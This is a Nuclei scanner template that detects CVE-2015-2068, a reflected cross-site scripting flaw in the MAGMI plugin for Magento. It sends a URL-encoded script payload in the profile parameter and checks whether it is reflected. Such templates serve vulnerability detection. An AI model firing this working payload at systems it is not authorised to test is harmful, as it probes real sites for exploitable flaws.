nuclei-templates/cves/2015/CVE-2015-2068.yaml

36 lines
1.1 KiB
YAML

id: CVE-2015-2068
info:
name: Magento Server Magmi Plugin - Cross Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile
parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2068
classification:
cve-id: CVE-2015-2068
tags: cve,cve2015,magento,magmi,xss,plugin
requests:
- method: GET
path:
- '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200